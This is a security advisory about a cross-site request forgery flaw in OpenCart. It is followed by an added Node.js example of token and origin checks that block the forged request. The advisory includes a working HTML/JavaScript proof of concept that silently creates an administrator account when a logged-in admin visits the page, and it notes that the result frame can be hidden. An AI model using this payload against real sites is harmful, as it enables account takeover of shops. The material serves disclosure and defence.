OpenCart suffers from a cross site request forgery vulnerability
Source: vfocus.net Author: vfocus Published: 2010-02-04
Advisory Information:

Title: OpenCart CSRF Vulnerability
Advisory URL: http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High

Vulnerability Description:

OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.

Proofs of Concept:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <title>OpenCart CSRF Vulnerability</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<script type="text/javascript">
		function csrfInjection()
		{
			var params = {
							'username'		: 'an_attacker',
							'firstname'		: 'attack',
							'lastname'		: 'user',
							'email'			: 'some.user@randomatackerdomain.com',
							'user_group_id'	: '1', //Default group id for administrator level is 1
							'password'		: 'test',
							'confirm'		: 'test',
							'status'		: '1'
						 };
			
			var form = document.createElement("form");
			form.setAttribute("method", "post");
			form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

			for(var key in params) {
				var hiddenField = document.createElement("input");
				hiddenField.setAttribute("type", "hidden");
				hiddenField.setAttribute("name", key);
				hiddenField.setAttribute("value", params[key]);

				form.appendChild(hiddenField);
			}

			attack_result.document.body.appendChild(form);
			form.submit();
		}
	</script>
  </head>
  <body>
    OpenCart CSRF Vulnerability

	<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
	<a href="#" onclick="csrfInjection();return false;">Add User</a>

	<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
	<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>
  </body>
</html>
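
The server-side check whose absence makes the POST above succeed, as an added example (not OpenCart's code and not part of the original advisory): a per-session token compared in constant time, plus an Origin/Referer check. The request shape, the `csrf_token` field name and the `shop.example` / `attacker.example` origins are assumptions made for illustration.

```javascript
const nodeCrypto = require('crypto');

// Create a per-session token; the admin form must carry it in a hidden field.
function issueCsrfToken(session) {
  session.csrfToken = nodeCrypto.randomBytes(32).toString('hex');
  return session.csrfToken;
}

// Constant-time comparison; missing or wrong-length values are rejected.
function tokensMatch(expected, supplied) {
  if (typeof expected !== 'string' || typeof supplied !== 'string') return false;
  const a = Buffer.from(expected);
  const b = Buffer.from(supplied);
  return a.length === b.length && nodeCrypto.timingSafeEqual(a, b);
}

// req is a hypothetical shape: { method, headers, body, session }.
function checkStateChangingRequest(req, trustedOrigin) {
  if (req.method !== 'POST') return { ok: false, reason: 'method' };
  const source = req.headers.origin || req.headers.referer;
  if (source) {
    let origin;
    try { origin = new URL(source).origin; } catch { return { ok: false, reason: 'origin' }; }
    if (origin !== trustedOrigin) return { ok: false, reason: 'origin' };
  }
  // Headers can be absent, so the token check is always enforced.
  if (!tokensMatch(req.session.csrfToken, req.body.csrf_token)) {
    return { ok: false, reason: 'token' };
  }
  return { ok: true, reason: null };
}

// Constructed sample: the POST the advisory's page makes the victim's browser send.
function forgedRequest(session) {
  return {
    method: 'POST',
    headers: { origin: 'https://attacker.example' },
    body: { username: 'an_attacker', user_group_id: '1', password: 'test', confirm: 'test', status: '1' },
    session: session, // the browser attaches the victim's session cookie
  };
}
```

The forged request carries the victim's session but cannot read the token stored in it, so it fails on the origin check and, if the headers are stripped, on the token check.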

 